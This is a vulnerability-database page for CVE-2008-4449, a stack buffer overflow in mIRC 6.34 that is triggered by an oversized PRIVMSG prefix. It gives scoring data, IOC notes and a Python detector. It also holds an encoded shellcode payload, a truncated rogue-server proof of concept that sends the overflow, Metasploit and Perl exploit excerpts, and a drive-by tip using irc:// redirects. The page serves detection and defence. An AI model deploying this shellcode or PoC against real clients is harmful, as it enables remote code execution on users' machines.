CVE-2008-4449
Published 2008-10-06
CVE-2008-4449: Stack-based buffer overflow in mIRC 6.34 allows remote attackers to execute arbitrary code via a long hostname in a PRIVMSG message.
Priority: P3 56 · Severity: critical · CVSS 2.0 base score: 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 38.74% (98.4th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mirc | mirc | — | — |
Detection & IOCs (extracted from the indexed sources)
Payload bytes taken from the indexed exploit code. The first bytes (\x2b\xc9 \x83\xe9\xde \xd9\xee \xd9\x74\x24\xf4 \x5b \x81\x73\x13 ...) are an fnstenv-based GetPC decoder stub that XORs the payload that follows in place; everything after the stub is encoder output and changes with every payload and key, so match on the stub and the surrounding PRIVMSG structure rather than on this blob as a whole:
\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e\x95\x97\xf1\x83\xeb\xfc\xe2\xf4\xe2\x7d\xd3\xf1\x1e\x95\x1c\xb4\x22\x1e\xeb\xf4\x66\x94\x78\x7a\x51\x8d\x1c\xae\x3e\x94\x7c\xb8\x95\xa1\x1c\xf0\xf0\xa4\x57\x68\xb2\x11\x57\x85\x19\x54\x5d\xfc\x1f\x57\x7c\x05\x25\xc1\xb3\xf5\x6b\x70\x1c\xae\x3a\x94\x7c\x97\x95\x99\xdc\x7a\x41\x89\x96\x1a\x95\x89\x1c\xf0\xf5\x1c\xcb\xd5\x1a\x56\xa6\x31\x7a\x1e\xd7\xc1\x9b\x55\xef\xfd\x95\xd5\x9b\x7a\x6e\x89\x3a\x7a\x76\x9d\x7c\xf8\x95\x15\x27\xf1\x1e\x95\x1c\x99\x22\xca\xa6\x07\x7e\xc3\x1e\x09\x9d\x55\xec\xa1\x76\x65\x1d\xf5\x41\xfd\x0f\x0f\x94\x9b\xc0\x0e\xf9\xf6\xf6\x9d\x7d\x95\x97\xf1
- Detect oversized IRC PRIVMSG hostname: a PRIVMSG message whose hostname/prefix field is 307 or more 'A' characters (or random alphanumeric filler) followed by binary data is the exploit trigger pattern.
- Detect the exploit PoC pattern: an IRC PRIVMSG with a prefix of 313 'A' characters followed by the two bytes \x43\x43 is the PoC trigger.
- Payload bad characters for this exploit include null bytes, IRC control characters, and common special characters; network signatures should flag IRC PRIVMSG messages containing binary data in the source prefix field.
- The exploit can be triggered via a browser by redirecting a victim to an irc:// URI pointing at the attacker's server, enabling drive-by exploitation.
- The Metasploit module listens on TCP port 6667 acting as a rogue IRC server; monitor for outbound mIRC connections to untrusted IRC servers on port 6667 followed by receipt of a PRIVMSG with a binary-laden prefix. Note that 6667 is only the module default: an attacker-controlled server, and an irc:// URI, can name any port.
- Due to payload space constraints (160 bytes), ordinal payloads may be required instead of full shellcode when using the Metasploit module.
- The Metasploit module uses a StackAdjustment of -3500, an unusual value that may affect payload reliability on non-targeted configurations.
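The bullets above describe the trigger pattern but not how to check for it on the wire. The following is an added example, not code from this page or from any of the exploit authors: it parses IRC lines per the RFC 1459 grammar (prefix runs from the leading ':' to the first space, which is exactly the field the overflow lives in) and flags PRIVMSG lines whose prefix is oversized, contains non-printable bytes, or carries the PoC's 'A' filler. The 307-byte threshold comes from the IOC notes above; the sample stream is constructed here from the PoC's two server lines plus a benign message and a variant with random filler and raw binary, and is not captured traffic.

```python
import re

# Threshold from the IOC notes on this page: the PoC uses a 313-byte prefix and
# the weaponised exploit 307+ bytes. A real prefix (nick!user@host) is far
# shorter, and RFC 1459 caps the entire line, prefix included, at 512 bytes.
MIN_SUSPECT_PREFIX_LEN = 307

# A legitimate prefix never carries bytes outside printable ASCII.
NON_PRINTABLE = re.compile(rb"[^\x20-\x7e]")
# Filler pattern from the public PoC: a long run of 'A'.
FILLER_RUN = re.compile(rb"A{300,}")


def parse_irc_line(line):
    """Split one raw IRC line (bytes) into (prefix, command, params).

    prefix is b'' when the line has none. The prefix runs from the leading
    ':' to the first space, which is exactly the field the overflow targets.
    """
    line = line.rstrip(b"\r\n")
    prefix = b""
    if line.startswith(b":"):
        sp = line.find(b" ")
        if sp == -1:  # malformed: a prefix with no command at all
            return line[1:], b"", b""
        prefix, line = line[1:sp], line[sp + 1:]
    parts = line.split(b" ", 1)
    command = parts[0].upper()
    params = parts[1] if len(parts) > 1 else b""
    return prefix, command, params


def classify_privmsg(line):
    """Return a list of reasons the line looks like the trigger; [] if benign."""
    prefix, command, _ = parse_irc_line(line)
    if command != b"PRIVMSG":
        return []
    reasons = []
    if len(prefix) >= MIN_SUSPECT_PREFIX_LEN:
        reasons.append("oversized prefix (%d bytes)" % len(prefix))
    if NON_PRINTABLE.search(prefix):
        reasons.append("non-printable bytes in prefix")
    if FILLER_RUN.search(prefix):
        reasons.append("long run of 'A' in prefix (PoC filler)")
    return reasons


def scan_session(lines):
    """Run the check over a server-to-client stream; return (index, reasons)."""
    hits = []
    for i, line in enumerate(lines):
        reasons = classify_privmsg(line)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample stream (not captured traffic): the two server lines from the
# securfrog PoC on this page, one benign PRIVMSG, and a variant that uses random
# alphanumeric filler plus raw binary in the prefix, as the weaponised exploit does.
SAMPLE_SESSION = [
    b":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow\r\n",
    b":alice!alice@example.net PRIVMSG yow :hello there\r\n",
    b":" + b"A" * 313 + b"\x43\x43" + b" PRIVMSG yow : /FINGER yow.\r\n",
    b":" + b"x7Qk" * 77 + b"\x90\x90\xcc" + b" PRIVMSG yow :x\r\n",
]

if __name__ == "__main__":
    for idx, reasons in scan_session(SAMPLE_SESSION):
        print("line %d: %s" % (idx, "; ".join(reasons)))
```

The check only makes sense on the server-to-client direction (mIRC is the victim, the rogue server sends the line), so apply it to inbound data on client egress connections, not just to traffic on port 6667. The length threshold is the robust part of the signature; the 'A' run and the \x43\x43 tail are PoC specifics that a weaponised variant will not keep.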
No detection rules found.
Exploit-DB: mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)
exploitdb · 2010-06-22 · CVE-2008-4449
---
##
# $Id: mirc_privmsg_server.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'mIRC PRIVMSG Handling Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.
By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG
command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads
may be necessary. This module is based on the code by SkD.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Versi
Exploit-DB: mIRC 6.34 - Remote Buffer Overflow
exploitdb · 2008-10-04 · CVE-2008-4449
---
#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat hotmail com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------
use IO::Socket;
if(!($ARGV[1]))
{
print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
print "[x] Use: mirc_exp.pl \n[x] Example: mirc_exp.pl 6667 0\n\n";
exit;
}
while(1)
{
my $sock=new IO::Socket::INET (
Listen => 1,
LocalA
Exploit-DB: mIRC 6.34 - Remote Buffer Overflow (PoC)
exploitdb · 2008-10-02 · CVE-2008-4449
---
##################################################################################################
# Mirc 6.34 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes.
#
# To become remote, add a simple document.location.href=irc://server.com/... in some html page
#
use IO::Socket;
sub sock()
{
my $sock=new IO::Socket::INET (
Listen => 1,
LocalAddr => 'localhost',
LocalPort => 6667,
Proto => 'tcp'); die unless $sock;
print " [+]IRC Server started on port 6667 \r\n";
$s=$sock->accept();
$a = "A" x 313;
$twobytes = "\x43\x43";
print " [+]Sending pickles\r\n";
print $s ":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow\r\n";
sleep(1);
print $s ":".$a.$twobytes." PRIVMSG yow : /FINGER yow.\r\n";
Metasploit: mIRC PRIVMSG Handling Stack Buffer Overflow
This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. This module is based on the code by SkD.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/32102
- http://securityreason.com/securityalert/4352
- http://www.securityfocus.com/bid/31552
- http://www.vupen.com/english/advisories/2008/2736
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45624
- https://www.exploit-db.com/exploits/6654
- https://www.exploit-db.com/exploits/6666